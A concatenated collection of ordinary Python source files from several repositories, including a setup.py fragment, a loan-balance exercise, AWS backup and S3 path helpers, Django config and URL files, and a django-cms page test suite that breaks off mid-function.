zip_safe=False, include_package_data=True, classifiers=[ 'Environment :: Web Environment', 'Framework :: Pyramid', 'Framework :: Flask', 'Framework :: Django', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.8', 'Topic :: Internet :: WWW/HTTP', 'Topic :: Software Development :: Libraries', 'Topic :: Software Development :: Libraries :: Python Modules', ] ) balance = 4842 annualInterestRate = 0.2 monthlyPaymentRate = 0.04 monthlyInterestRate = annualInterestRate/12.0 remainingBalance = balance month = 0 mmp = 0 totalPaid = 0 while month < 12 and remainingBalance > 0: month += 1 mmp = monthlyPaymentRate * remainingBalance remainingBalance = remainingBalance - mmp remainingBalance = remainingBalance + (remainingBalance * monthlyInterestRate) print ("Month: " + str(month)) print ("Minimum monthly payment: " + str(round(mmp,2))) print ("Remaining balance: " + str(round(remainingBalance, 2))) totalPaid += mmp print("Total paid: " + str(round((totalPaid),2))) print ("Remaining balance: " + str(round(remainingBalance,2)))meckhardt/aws-codecommit-serverless-backup # Copyright 2012-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved. # SPDX-License-Identifier: MIT-0 import boto3 client = boto3.client('codebuild') def handler(event, context): response = client.start_build(projectName='CodeCommitBackup') output = "Triggered CodeBuild project: 'CodeCommitBackup' to back all CodeCommit repos in this account/region. Status={}".format(response["build"]["buildStatus"]) print(output) return output umccr/woof-nfwoof_nf/s3path.py import pathlib import re import boto3 from . import log MESSAGE_LOGGED = False S3_PATH_RE = re.compile(r'^s3://([^/]+)/?(.*?)$') class VirtualPath(): def __init__(self, paths, current_path='root'): self.paths = paths if current_path == 'root': assert len(paths[current_path]) == 1 self.current_path = list(paths[current_path])[0] else: self.current_path = current_path def __str__(self): return self.current_path def is_dir(self): return self.current_path.endswith('/') def iterdir(self): for path in self.paths[self.current_path]: yield self.__class__(self.paths, path) @property def name(self): # Allows interop with pathlib.Path return pathlib.Path(self.current_path).name def process_paths(s3_path_info, run): virtual_paths = list() for i, d in enumerate(s3_path_info, 1): log.render(f' processing run {run}: path {i}/{len(s3_path_info)}...', end='\r', flush=True) # Get a list of all objects in bucket with given prefix s3_bucket = boto3.resource('s3').Bucket(d['bucket']) paths = [f'{d["bucket"]}/{r.key}' for r in s3_bucket.objects.filter(Prefix=d['key'])] # Create a virtual file path set vpath = create_virtual_paths(paths, d['bucket'], d['key']) virtual_paths.append(vpath) log.render(f' processing run {run}: path {i}/{len(s3_path_info)}... done', flush=True) return virtual_paths def create_virtual_paths(path_list, bucket, prefix): paths = dict() for fp in path_list: # Normalise path and then split into parts fp_normalised = fp.replace('//', '/') parts = fp_normalised.split('/') parts[0] = f's3://{parts[0]}' # Iterate and create a flat dict with parent dirs mapping to children: # directory -> contents path_parent = 'root' path = str() for i, part in enumerate(parts, 1): if i == len(parts): path += part else: path += f'{part}/' if path_parent not in paths: paths[path_parent] = set() paths[path_parent].add(path) path_parent = path current_path = f's3://{bucket}/{prefix}' if not current_path.endswith('/'): current_path += '/' return VirtualPath(paths, current_path=current_path) zachwylde00/remix.solidity.network-cryptocoin2slack # -*- coding: utf-8 -*- """Configuration for logging.""" # idea on setting up logging: # default level is WARN # default level for log file is INFO # in order for this to work: # set root logger to NOTSET (so all messages are processed) # in console handler set to WARN # in file handler set to INFO # -v in script changes it to INFO # -vv in script changes it to DEBUG # these options will need to modify the specific handler to actually work # drop support of environment variable config = { "version": 1, "root": { "handlers": [ "console", "file", ], "level": "NOTSET", }, "handlers": { "console": { "class": "logging.StreamHandler", "formatter": "simple", "level": "WARN", "stream": "ext://sys.stderr", }, "file": { "class": "logging.handlers.RotatingFileHandler", "formatter": "simple", "level": "INFO", "filename": "log/cryptocoin2slack.log", "maxBytes": 102400, "backupCount": 5, }, }, "formatters": { "simple": { "format": "%(asctime)s [%(levelname)s:%(name)s] %(message)s", }, "brief": { "format": "%(message)s", }, }, } DevStone-d/e-commerce-cms from django.urls import path from django.views.generic import RedirectView from . import views app_name='users' urlpatterns = [ path("", views.index, name="index"), path("profile", views.profile, name="profile"), path("orders", views.orders, name="orders"), path("reviews", views.reviews, name="reviews"), path("adress", views.adress, name="adress"), path("changePass", views.changePass, name="changePass"), path("adressdelete/", views.adressdelete, name="adressdelete"), ] # Copyright (c) 2021 <> # Author: <> # See LICENSE file import urwid from .dialog import Dialog class ErrorDialog(Dialog): def __init__(self, exception, title=u'Error', prefix=None): message = [] message.append('\n') if prefix is not None: message.append(('error_message', prefix)) message.append('\n\n') message.append(('error_message', str(exception))) message = urwid.Text(message, align='center') super().__init__(message, title=title) def keypress(self, size, key): if key == 'enter' or key == 'esc': urwid.emit_signal(self, self.SIGNAL_OK, self, 'Ok') return return super().keypress(size, key) UuuNyaa/blender_mmd_assets # -*- coding: utf-8 -*- # Copyright 2021 UuuNyaa <> # This file is part of blender_mmd_assets. import json import sys import requests def list_asset_download_counts(session, repo): response = session.get(f'https://api.github.com/repos/{repo}/releases') response.raise_for_status() releases = json.loads(response.text) assets = [] for release in releases: for asset in release['assets']: assets.append({ 'updated_at': asset['updated_at'], 'name': asset['name'], 'size': asset['size'], 'download_count': asset['download_count'], }) return assets if __name__ == '__main__': if len(sys.argv) != 2: print(f'ERROR: invalid arguments: {[a for a in sys.argv]}', file=sys.stderr) exit(1) repo = sys.argv[1] session = requests.Session() print(json.dumps(list_asset_download_counts(session, repo), indent=2, ensure_ascii=False)) import datetime import os.path import functools from unittest import skipIf from django.conf import settings from django.contrib.auth import get_user_model from django.contrib.sites.models import Site from django.core.cache import cache from django.core.exceptions import ValidationError from django.http import HttpResponse, HttpResponseNotFound from django.urls import reverse from django.utils.timezone import now as tz_now from django.utils.translation import override as force_language from cms import constants from cms.api import create_page, add_plugin, create_title, publish_page from cms.exceptions import PublicIsUnmodifiable, PublicVersionNeeded from cms.forms.validators import validate_url_uniqueness from cms.models import Page, Title from cms.models.placeholdermodel import Placeholder from cms.models.pluginmodel import CMSPlugin from cms.sitemaps import CMSSitemap from cms.test_utils.testcases import CMSTestCase, TransactionCMSTestCase from cms.utils.conf import get_cms_setting from cms.utils.page import ( get_available_slug, get_current_site, get_page_from_request, ) class PageMigrationTestCase(CMSTestCase): def test_content_type(self): """ Test correct content type is set for Page object """ from django.contrib.contenttypes.models import ContentType self.assertEqual(ContentType.objects.filter(model='page', app_label='cms').count(), 1) def has_no_custom_user(): return get_user_model().USERNAME_FIELD != 'email' class PagesTestCase(TransactionCMSTestCase): def tearDown(self): cache.clear() def test_absolute_url(self): user = self.get_superuser() page = self.create_homepage("page", "nav_playground.html", "en", published=True) create_title("fr", "french home", page) page_2 = create_page("inner", "nav_playground.html", "en", published=True, parent=page) create_title("fr", "french inner", page_2) publish_page(page_2, user, "fr") self.assertEqual(page_2.get_absolute_url(), '/en/inner/') self.assertEqual(page_2.get_absolute_url(language='en'), '/en/inner/') self.assertEqual(page_2.get_absolute_url(language='fr'), '/fr/french-inner/') with force_language('fr'): self.assertEqual(page_2.get_absolute_url(), '/fr/french-inner/') self.assertEqual(page_2.get_absolute_url(language='en'), '/en/inner/') self.assertEqual(page_2.get_absolute_url(language='fr'), '/fr/french-inner/') def test_get_root_page(self): _create = functools.partial( create_page, template='nav_playground.html', language='en', published=True, ) page_a = _create('page_a') page_a_a = _create('page_a_a_a', parent=page_a) page_a_a_a = _create('page_a_a_a', parent=page_a_a) page_tree_with_root = [ (page_a, page_a), (page_a_a, page_a), (page_a_a_a, page_a), ] for page, root in page_tree_with_root: self.assertEqual(page.get_root(), root) self.assertEqual(page.publisher_public.get_root(), root.publisher_public) def test_treebeard_delete(self): """ This is a test for #4102 When deleting a page, parent must be updated too, to reflect the new tree status. This is handled by MP_NodeQuerySet (which was not used before the fix) """ page1 = create_page('home', 'nav_playground.html', 'en', published=True) page2 = create_page('page2', 'nav_playground.html', 'en', parent=page1, published=True) page3 = create_page('page3', 'nav_playground.html', 'en', parent=page2, published=True) self.assertEqual(page1.node.depth, 1) self.assertEqual(page1.node.numchild, 1) self.assertFalse(page1.node.is_leaf()) self.assertEqual(page2.node.depth, 2) self.assertEqual(page2.node.numchild, 1) self.assertFalse(page2.node.is_leaf()) self.assertEqual(page3.node.depth, 3) self.assertEqual(page3.node.numchild, 0) self.assertTrue(page3.node.is_leaf()) page3.delete() page1 = page1.reload().get_draft_object() page2 = page2.reload().get_draft_object() self.assertEqual(page2.node.depth, 2) self.assertEqual(page2.node.numchild, 0) self.assertTrue(page2.node.is_leaf()) page3 = create_page('page3', 'nav_playground.html', 'en', parent=page2, reverse_id='page3') self.assertEqual(page2.node.depth, 2) self.assertEqual(page2.node.numchild, 1) self.assertFalse(page2.node.is_leaf()) self.assertEqual(page3.node.depth, 3) self.assertEqual(page3.node.numchild, 0) self.assertTrue(page3.node.is_leaf()) page1.publish('en') page2.publish('en') page3.publish('en') self.assertEqual(page1.node.depth, 1) self.assertEqual(page1.node.numchild, 1) self.assertFalse(page1.node.is_leaf()) self.assertEqual(page2.node.depth, 2) self.assertEqual(page2.node.numchild, 1) self.assertFalse(page2.node.is_leaf()) self.assertEqual(page3.node.depth, 3) self.assertEqual(page3.node.numchild, 0) self.assertTrue(page3.node.is_leaf()) def test_create_page_api(self): page_data = { 'title': 'root', 'slug': 'root', 'language': settings.LANGUAGES[0][0], 'template': 'nav_playground.html', } page = self.create_homepage(**page_data) page = page.reload() page.publish('en') self.assertEqual(Page.objects.count(), 2) self.assertTrue(page.is_home) self.assertTrue(page.publisher_public.is_home) self.assertEqual(list(Title.objects.drafts().values_list('path', flat=True)), [u'']) self.assertEqual(list(Title.objects.public().values_list('path', flat=True)), [u'']) @skipIf(has_no_custom_user(), 'No custom user') def test_create_page_api_with_long_username(self): page_data = { 'title': 'root', 'slug': 'root', 'language': settings.LANGUAGES[0][0], 'template': 'nav_playground.html', 'created_by': self._create_user( 'V' * constants.PAGE_USERNAME_MAX_LENGTH + 'ERY-LONG-USERNAME', is_staff=True, is_superuser=True, ), } page = create_page(**page_data) self.assertEqual(Page.objects.count(), 1) self.assertLessEqual(len(page.created_by), constants.PAGE_USERNAME_MAX_LENGTH) self.assertRegexpMatches(page.created_by, r'V+\.{3} \(id=\d+\)') self.assertLessEqual(len(page.changed_by), constants.PAGE_USERNAME_MAX_LENGTH) self.assertRegexpMatches(page.changed_by, r'V+\.{3} \(id=\d+\)') self.assertEqual(list(Title.objects.drafts().values_list('path', flat=True)), [u'root']) def test_delete_page_no_template(self): page_data = { 'title': 'root', 'slug': 'root', 'language': settings.LANGUAGES[0][0], 'template': 'nav_playground.html', } page = create_page(**page_data) page.template = 'no_such_template.html' page.delete() self.assertEqual(Page.objects.count(), 0) def test_get_available_slug_recursion(self): """ Checks cms.utils.page.get_available_slug for infinite recursion """ site = get_current_site() for x in range(0, 12): create_page('test copy', 'nav_playground.html', 'en', published=True) new_slug = get_available_slug(site, 'test-copy', 'en') self.assertTrue(new_slug, 'test-copy-11') def test_path_collisions_api_1(self): """ Checks for slug collisions on sibling pages - uses API to create pages """ site = get_current_site() page1 = create_page('test page 1', 'nav_playground.html', 'en', published=True) page1_1 = create_page('test page 1_1', 'nav_playground.html', 'en', published=True, parent=page1, slug="foo") page1_2 = create_page('test page 1_2', 'nav_playground.html', 'en', published=True, parent=page1, slug="foo") # both sibling pages has same slug, so both pages have an invalid slug self.assertRaises( ValidationError, validate_url_uniqueness, site=site, path=page1_1.get_path('en'), language='en', exclude_page=page1_1, ) self.assertRaises( ValidationError, validate_url_uniqueness, site=site, path=page1_2.get_path('en'), language='en', exclude_page=page1_2, ) def test_path_collisions_api_2(self): """ Checks for slug collisions on root (not home) page and a home page child - uses API to create pages """ site = get_current_site() page1 = self.create_homepage('test page 1', 'nav_playground.html', 'en', published=True) page1_1 = create_page('test page 1_1', 'nav_playground.html', 'en', published=True, parent=page1, slug="foo") page2 = create_page('test page 1_1', 'nav_playground.html', 'en', published=True, slug="foo") # Root (non home) page and child page has the same slug, both are invalid self.assertRaises( ValidationError, validate_url_uniqueness, site=site, path=page1_1.get_path('en'), language='en', exclude_page=page1_1, ) self.assertRaises( ValidationError, validate_url_uniqueness, site=site, path=page2.get_path('en'), language='en', exclude_page=page2, ) def test_path_collisions_api_3(self): """ Checks for slug collisions on children of a non root page - uses API to create pages """ site = get_current_site() page1 = create_page('test page 1', 'nav_playground.html', 'en', published=True) page1_1 = create_page('test page 1_1', 'nav_playground.html', 'en', published=True, parent=page1, slug="foo") page1_1_1 = create_page('test page 1_1_1', 'nav_playground.html', 'en', published=True, parent=page1_1, slug="bar") page1_1_2 = create_page('test page 1_1_1', 'nav_playground.html', 'en', published=True, parent=page1_1, slug="bar") page1_2 = create_page('test page 1_2', 'nav_playground.html', 'en', published=True, parent=page1, slug="bar") # Direct children of home has different slug so it's ok. self.assertTrue(validate_url_uniqueness( site, path=page1_1.get_path('en'), language='en', exclude_page=page1_1, )) self.assertTrue(validate_url_uniqueness( site, path=page1_2.get_path('en'), language='en', exclude_page=page1_2, )) # children of page1_1 has the same slug -> you lose! self.assertRaises( ValidationError, validate_url_uniqueness, site=site, path=page1_1_1.get_path('en'), language='en', exclude_page=page1_1_1, ) self.assertRaises( ValidationError, validate_url_uniqueness, site=site, path=page1_1_2.get_path('en'), language='en', exclude_page=page1_1_2, ) def test_details_view(self): """ Test the details view """ superuser = self.get_superuser() self.assertEqual(Page.objects.all().count(), 0) with self.login_user_context(superuser): page = self.create_homepage('test page 1', "nav_playground.html", "en") page.publish('en') response = self.client.get(self.get_pages_root()) self.assertEqual(response.status_code, 200) self.assertTrue(page.publish('en')) page2 = create_page("test page 2", "nav_playground.html", "en", parent=page, published=True) homepage = Page.objects.get_home() self.assertTrue(homepage.get_slug(), 'test-page-1') self.assertEqual(page2.get_absolute_url(), '/en/test-page-2/') response = self.client.get(page2.get_absolute_url()) self.assertEqual(response.status_code, 200) def test_public_exceptions(self): page_a = create_page("page_a", "nav_playground.html", "en", published=True) page_b = create_page("page_b", "nav_playground.html", "en") page = page_a.publisher_public self.assertRaises(PublicIsUnmodifiable, page.copy_with_descendants, page_b, 'last-child') self.assertRaises(PublicIsUnmodifiable, page.unpublish, 'en') self.assertRaises(PublicIsUnmodifiable, page.revert_to_live, 'en') self.assertRaises(PublicIsUnmodifiable, page.publish, 'en') self.assertTrue(page.get_draft_object().publisher_is_draft) self.assertRaises(PublicVersionNeeded, page_b.revert_to_live, 'en') def test_move_page_regression_left_to_right_5752(self): # ref: https://github.com/divio/django-cms/issues/5752 # Tests tree integrity when moving sibling pages from left # to right under the same parent. home = create_page("Home", "nav_playground.html", "en", published=True) alpha = create_page( "Alpha", "nav_playground.html", "en", published=True, parent=home, ) beta = create_page( "Beta", "nav_playground.html", "en", published=True, parent=home, ) beta.move_page(alpha.node, position='left') # Draft self.assertEqual(home.node.path, '0001') self.assertEqual(beta.node.path, '00010001') self.assertEqual(alpha.node.path, '00010002') def test_move_page_regression_right_to_left_5752(self): # ref: https://github.com/divio/django-cms/issues/5752 # Tests tree integrity when moving sibling pages from right # to left under the same parent. home = create_page("Home", "nav_playground.html", "en", published=True) alpha = create_page( "Alpha", "nav_playground.html", "en", published=True, parent=home, ) beta = create_page( "Beta", "nav_playground.html", "en", published=True, parent=home, ) beta.move_page(alpha.node, position='left') alpha.refresh_from_db() beta.refresh_from_db() # Draft self.assertEqual(home.node.path, '0001') self.assertEqual(beta.node.path, '00010001') self.assertEqual(alpha.node.path, '00010002') def test_move_page_regression_5640(self): # ref: https://github.com/divio/django-cms/issues/5640 alpha = create_page("Alpha", "nav_playground.html", "en", published=True) beta = create_page("Beta", "nav_playground.html", "en", published=False) alpha.move_page(beta.node, position='right') self.assertEqual(beta.node.path, '0002') self.assertEqual(alpha.node.path, '0003') def test_move_page_regression_nested_5640(self): # ref: https://github.com/divio/django-cms/issues/5640 alpha = create_page("Alpha", "nav_playground.html", "en", published=True) beta = create_page("Beta", "nav_playground.html", "en", published=False) gamma = create_page("Gamma", "nav_playground.html", "en", published=False) delta = create_page("Delta", "nav_playground.html", "en", published=True) theta = create_page("Theta", "nav_playground.html", "en", published=True) beta.move_page(alpha.node, position='last-child') gamma.move_page(beta.reload().node, position='last-child') delta.move_page(gamma.reload().node, position='last-child') theta.move_page(delta.reload().node, position='last-child') tree = [ (alpha, '0001'), (beta, '00010001'), (gamma, '000100010001'), (delta, '0001000100010001'), (theta, '00010001000100010001'), ] for page, path in tree: self.assertEqual(page.reload().node.path, path) def test_move_page_regression_5643(self): # ref: https://github.com/divio/django-cms/issues/5643 alpha = create_page("Alpha", "nav_playground.html", "en", published=True) beta = create_page("Beta", "nav_playground.html", "en", published=False) gamma = create_page("Gamma", "nav_playground.html", "en", published=False) delta = create_page("Delta", "nav_playground.html", "en", published=True) theta = create_page("Theta", "nav_playground.html", "en", published=True) beta.move_page(alpha.node, position='last-child') gamma.move_page(beta.node, position='last-child') delta.move_page(gamma.node, position='last-child') theta.move_page(delta.node, position='last-child') self.assertPublished(alpha.reload()) self.assertNeverPublished(beta.reload()) self.assertNeverPublished(gamma.reload()) self.assertPending(delta.reload()) self.assertPending(theta.reload()) def test_publish_page_regression_5642(self): # ref: https://github.com/divio/django-cms/issues/5642 alpha = create_page("Alpha", "nav_playground.html", "en", published=True) beta = create_page("Beta", "nav_playground.html", "en", published=False) gamma = create_page("Gamma", "nav_playground.html", "en", published=False) delta = create_page("Delta", "nav_playground.html", "en", published=True) theta = create_page("Theta", "nav_playground.html", "en", published=True) beta.move_page(alpha.node, position='last-child') gamma.move_page(beta.reload().node, position='last-child') delta.move_page(gamma.reload().node, position='last-child') theta.move_page(delta.reload().node, position='last-child') beta.reload().publish('en') # The delta and theta pages should remain pending publication # because gamma is still unpublished self.assertPublished(beta.reload()) self.assertNeverPublished(gamma.reload()) self.assertPending(delta.reload()) self.assertPending(theta.reload()) gamma.reload().publish('en') self.assertPublished(gamma.reload()) self.assertPublished(delta.reload()) self.assertPublished(theta.reload()) def test_publish_page_regression_6188(self): # ref: https://github.com/divio/django-cms/issues/6188 page = create_page("en-page", "nav_playground.html", "en", published=False) create_title('de', 'de-page', page) create_title('fr', 'fr-page', page) # Publishing the en language should set "en" as the only language # on the public version of the page. page.publish("en") self.assertListEqual(sorted(page.publisher_public.get_languages()), ['en']) page.publish("de") # Now there should be "en" and "de" on the public page self.assertSequenceEqual(sorted(page.publisher_public.get_languages()), ['de', 'en']) page.publish("fr") # Now there should be "en", "de" and "fr" on the public page self.assertSequenceEqual(sorted(page.publisher_public.get_languages()), ['de', 'en', 'fr']) def test_move_page_inherit(self): parent = create_page("Parent", 'col_three.html', "en") child = create_page("Child", constants.TEMPLATE_INHERITANCE_MAGIC, "en", parent=parent) self.assertEqual(child.get_template(), parent.get_template()) child.move_page(parent.node, 'left') child = Page.objects.get(pk=child.pk) self.assertEqual(child.get_template(), parent.get_template()) def test_add_placeholder(self): # create page page = create_page("Add Placeholder", "nav_playground.html", "en", position="last-child", published=True, in_navigation=True) page.template = 'add_placeholder.html' page.save() page.publish('en') url = page.get_absolute_url() response = self.client.get(url) self.assertEqual(200, response.status_code) path = os.path.join(settings.TEMPLATES[0]['DIRS'][0], 'add_placeholder.html') with open(path, 'r') as fobj: old = fobj.read() try: new = old.replace( '', '{% placeholder second_placeholder %}' ) with open(path, 'w') as fobj: fobj.write(new) response = self.client.get(url) self.assertEqual(200, response.status_code) finally: with open(path, 'w') as fobj: fobj.write(old) def test_sitemap_login_required_pages(self): """ Test that CMSSitemap object contains only published,public (login_required=False) pages """ create_page("page", "nav_playground.html", "en", login_required=True, published=True, in_navigation=True) self.assertEqual(CMSSitemap().items().count(), 0) def test_sitemap_includes_last_modification_date(self): one_day_ago = tz_now() - datetime.timedelta(days=1) page = create_page("page", "nav_playground.html", "en", published=True, publication_date=one_day_ago) page.creation_date = one_day_ago page.save() page.publish('en') sitemap = CMSSitemap() self.assertEqual(sitemap.items().count(), 1) actual_last_modification_time = sitemap.lastmod(sitemap.items()[0]) self.assertTrue(actual_last_modification_time > one_day_ago) def test_sitemap_uses_publication_date_when_later_than_modification(self): now = tz_now() now -= datetime.timedelta(microseconds=now.microsecond) one_day_ago = now - datetime.timedelta(days=1) page = create_page("page", "nav_playground.html", "en", published=True, publication_date=now) title = page.get_title_obj('en') page.creation_date = one_day_ago page.changed_date = one_day_ago sitemap = CMSSitemap() actual_last_modification_time = sitemap.lastmod(title) self.assertEqual(actual_last_modification_time.date(), now.date()) def test_templates(self): """ Test the inheritance magic for templates """ parent = create_page("parent", "nav_playground.html", "en") child = create_page("child", "nav_playground.html", "en", parent=parent) grand_child = create_page("grand child", "nav_playground.html", "en", parent=child) child2 = create_page("child2", "col_two.html", "en", parent=parent) grand_child2 = create_page("grand child2", "nav_playground.html", "en", parent=child2) child.template = constants.TEMPLATE_INHERITANCE_MAGIC grand_child.template = constants.TEMPLATE_INHERITANCE_MAGIC child.save() grand_child.save() grand_child2.template = constants.TEMPLATE_INHERITANCE_MAGIC grand_child2.save() self.assertFalse(hasattr(grand_child, '_template_cache')) with self.assertNumQueries(1): self.assertEqual(child.template, constants.TEMPLATE_INHERITANCE_MAGIC) self.assertEqual(parent.get_template_name(), grand_child.get_template_name()) # test template cache with self.assertNumQueries(0): grand_child.get_template() self.assertFalse(hasattr(grand_child2, '_template_cache')) with self.assertNumQueries(1): self.assertEqual(child2.template, 'col_two.html') self.assertEqual(child2.get_template_name(), grand_child2.get_template_name()) # test template cache with self.assertNumQueries(0): grand_child2.get_template() parent.template = constants.TEMPLATE_INHERITANCE_MAGIC parent.save() self.assertEqual(parent.template, constants.TEMPLATE_INHERITANCE_MAGIC) self.assertEqual(parent.get_template(), get_cms_setting('TEMPLATES')[0][0]) self.assertEqual(parent.get_template_name(), get_cms_setting('TEMPLATES')[0][1]) def test_delete_with_plugins(self): """ Check that plugins and placeholders get correctly deleted when we delete a page! """ Text = self.get_plugin_model('TextPlugin') home = create_page("home", "nav_playground.html", "en") page = create_page("page", "nav_playground.html", "en") page.rescan_placeholders() # create placeholders placeholder = page.placeholders.all()[0] plugin_base = CMSPlugin( plugin_type='TextPlugin', placeholder=placeholder, position=1, language=settings.LANGUAGES[0][0] ) plugin_base = plugin_base.add_root(instance=plugin_base) plugin = Text(body='') plugin_base.set_base_attr(plugin) plugin.save() self.assertEqual(CMSPlugin.objects.count(), 1) self.assertEqual(Text.objects.count(), 1) self.assertTrue(Placeholder.objects.count() > 2) superuser = self.get_superuser() home_pl_count = home.get_placeholders().count() page_pl_count = page.get_placeholders().count() expected_pl_count = Placeholder.objects.count() - (home_pl_count + page_pl_count) with self.login_user_context(superuser): # Delete page self.client.post(self.get_admin_url(Page, 'delete', page.pk), {'post': 'yes'}) with self.login_user_context(superuser): # Delete home page self.client.post(self.get_admin_url(Page, 'delete', home.pk), {'post': 'yes'}) self.assertEqual(CMSPlugin.objects.count(), 0) self.assertEqual(Text.objects.count(), 0) self.assertEqual(Placeholder.objects.exclude(slot='clipboard').count(), expected_pl_count) self.assertEqual(Page.objects.count(), 0) def test_get_page_from_request_nopage(self): request = self.get_request('/') page = get_page_from_request(request) self.assertEqual(page, None) def test_get_page_from_request_with_page_404(self): page = create_page("page", "nav_playground.html", "en", published=True) page.publish('en') request = self.get_request('/does-not-exist/') found_page = get_page_from_request(request) self.assertEqual(found_page, None) def test_get_page_without_final_slash(self): root = create_page("root", "nav_playground.html", "en", slug="root", published=True) page = create_page("page", "nav_playground.html", "en", slug="page", published=True, parent=root) root.publish('en') page = page.reload() page.publish('en') request = self.get_request('/en/root/page') found_page = get_page_from_request(request) self.assertIsNotNone(found_page) self.assertFalse(found_page.publisher_is_draft) def test_ancestor_expired(self): yesterday = tz_now() - datetime.timedelta(days=1) tomorrow = tz_now() + datetime.timedelta(days=1) root = create_page("root", "nav_playground.html", "en", slug="root", published=True) page_past = create_page("past", "nav_playground.html", "en", slug="past", publication_end_date=yesterday, published=True, parent=root) page_test = create_page("test", "nav_playground.html", "en", slug="test", published=True, parent=page_past) page_future = create_page("future", "nav_playground.html", "en", slug="future", publication_date=tomorrow, published=True, parent=root) page_test_2 = create_page("test", "nav_playground.html", "en", slug="test", published=True, parent=page_future) request = self.get_request(page_test.get_absolute_url()) page = get_page_from_request(request) self.assertEqual(page, None) request = self.get_request(page_test_2.get_absolute_url()) page = get_page_from_request(request) self.assertEqual(page, None) def test_page_already_expired(self): """ Test that a page which has a end date in the past gives a 404, not a 500. """ yesterday = tz_now() - datetime.timedelta(days=1) with self.settings(CMS_PERMISSION=False): page = create_page('page', 'nav_playground.html', 'en', publication_end_date=yesterday, published=True) resp = self.client.get(page.get_absolute_url('en')) self.assertEqual(resp.status_code, 404) def test_page_urls(self): page1 = self.create_homepage('test page 1', 'nav_playground.html', 'en', published=True) page2 = create_page('test page 2', 'nav_playground.html', 'en', published=True, parent=page1) page3 = create_page('test page 3', 'nav_playground.html', 'en', published=True, parent=page2) page4 = create_page('test page 4', 'nav_playground.html', 'en', published=True) page5 = create_page('test page 5', 'nav_playground.html', 'en', published=True, parent=page4) page1 = page1.reload() page2 = page2.reload() page3 = page3.reload() page4 = page4.reload() page5 = page5.reload() self.assertEqual(page3.node.parent_id, page2.node.pk) self.assertEqual(page2.node.parent_id, page1.node.pk) self.assertEqual(page5.node.parent_id, page4.node.pk) self.assertEqual(page1.get_absolute_url(), self.get_pages_root() + '') self.assertEqual(page2.get_absolute_url(), self.get_pages_root() + 'test-page-2/') self.assertEqual(page3.get_absolute_url(), self.get_pages_root() + 'test-page-2/test-page-3/') self.assertEqual(page4.get_absolute_url(), self.get_pages_root() + 'test-page-4/') self.assertEqual(page5.get_absolute_url(), self.get_pages_root() + 'test-page-4/test-page-5/') page3 = self.move_page(page3, page1) self.assertEqual(page3.get_absolute_url(), self.get_pages_root() + 'test-page-3/') page3 = page3.reload() page2 = page2.reload() page5 = page5.reload() page5 = self.move_page(page5, page2) self.assertEqual(page5.get_absolute_url(), self.get_pages_root() + 'test-page-2/test-page-5/') page3 = page3.reload() page4 = page4.reload() page3 = self.move_page(page3, page4) self.assertEqual(page3.get_absolute_url(), self.get_pages_root() + 'test-page-4/test-page-3/') def test_page_and_title_repr(self): non_saved_page = Page() self.assertIsNone(non_saved_page.pk) self.assertIn('id=None', repr(non_saved_page)) saved_page = create_page('test saved page', 'nav_playground.html', 'en') self.assertIsNotNone(saved_page.pk) self.assertIn('id={}'.format(saved_page.pk), repr(saved_page)) self.assertIn('is_draft={}'.format(saved_page.publisher_is_draft), repr(saved_page)) non_saved_title = Title() self.assertIsNone(non_saved_title.pk) self.assertIn('id=None', repr(non_saved_title)) saved_title = saved_page.get_title_obj() self.assertIsNotNone(saved_title.pk) self.assertIn('id={}'.format(saved_title.pk), repr(saved_title)) self.assertIn('is_draft={}'.format(saved_title.publisher_is_draft), repr(saved_title)) def test_page_overwrite_urls(self): page1 = self.create_homepage('test page 1', 'nav_playground.html', 'en', published=True) page2 = create_page('test page 2', 'nav_playground.html', 'en', published=True, parent=page1) page3 = create_page('test page 3', 'nav_playground.html', 'en', published=True, parent=page2, overwrite_url='i-want-another-url') superuser = self.get_superuser() self.assertEqual(page2.get_absolute_url(), self.get_pages_root() + 'test-page-2/') self.assertEqual(page3.get_absolute_url(), self.get_pages_root() + 'i-want-another-url/') endpoint = self.get_admin_url(Page, 'change', page2.pk) with self.login_user_context(superuser): response = self.client.post(endpoint, {'title': 'test page 2', 'slug': 'page-test-2'}) self.assertRedirects(response, self.get_admin_url(Page, 'changelist')) page2 = Page.objects.get(pk=page2.pk) page3 = Page.objects.get(pk=page3.pk) self.assertEqual(page2.get_absolute_url(), self.get_pages_root() + 'page-test-2/') self.assertEqual(page3.get_absolute_url(), self.get_pages_root() + 'i-want-another-url/') # tests a bug found in 2.2 where saving an ancestor page # wiped out the overwrite_url for child pages page2.save() self.assertEqual(page3.get_absolute_url(), self.get_pages_root() + 'i-want-another-url/') def test_slug_url_overwrite_clash(self): """ Tests if a URL-Override clashes with a normal page url """ site = get_current_site() with self.settings(CMS_PERMISSION=False): create_page('home', 'nav_playground.html', 'en', published=True) bar = create_page('bar', 'nav_playground.html', 'en', published=False) foo = create_page('foo', 'nav_playground.html', 'en', published=True) # Tests to assure is_valid_url is ok on plain pages self.assertTrue(validate_url_uniqueness( site, path=bar.get_path('en'), language='en', exclude_page=bar, )) self.assertTrue(validate_url_uniqueness( site, path=foo.get_path('en'), language='en', exclude_page=foo, )) # Set url_overwrite for page foo title = foo.get_title_obj(language='en') title.has_url_overwrite = True title.path = 'bar' title.save() foo.publish('en') self.assertRaises( ValidationError, validate_url_uniqueness, site, path=bar.get_path('en'), language='en', exclude_page=bar, ) def test_valid_url_multisite(self): site1 = Site.objects.get_current() site3 = Site.objects.create(domain="sample3.com", name="sample3.com") home = create_page('home', 'nav_playground.html', 'de', published=True, site=site1) bar = create_page('bar', 'nav_playground.html', 'de', slug="bar", published=True, parent=home, site=site1) home_s3 = create_page('home', 'nav_playground.html', 'de', published=True, site=site3) bar_s3 = create_page('bar', 'nav_playground.html', 'de', slug="bar", published=True, parent=home_s3, site=site3) self.assertTrue(validate_url_uniqueness( site1, path=bar.get_path('de'), language='de', exclude_page=bar, )) self.assertTrue(validate_url_uniqueness( site3, path=bar_s3.get_path('de'), language='de', exclude_page=bar_s3, )) def test_home_slug_not_accessible(self): with self.settings(CMS_PERMISSION=False): page = self.create_homepage('page', 'nav_playground.html', 'en', published=True) self.assertEqual(page.get_absolute_url('en'), '/en/') resp = self.client.get('/en/') self.assertEqual(resp.status_code, HttpResponse.status_code) resp = self.client.get('/en/page/') self.assertEqual(resp.status_code, HttpResponseNotFound.status_code) def test_plugin_loading_queries(self): with 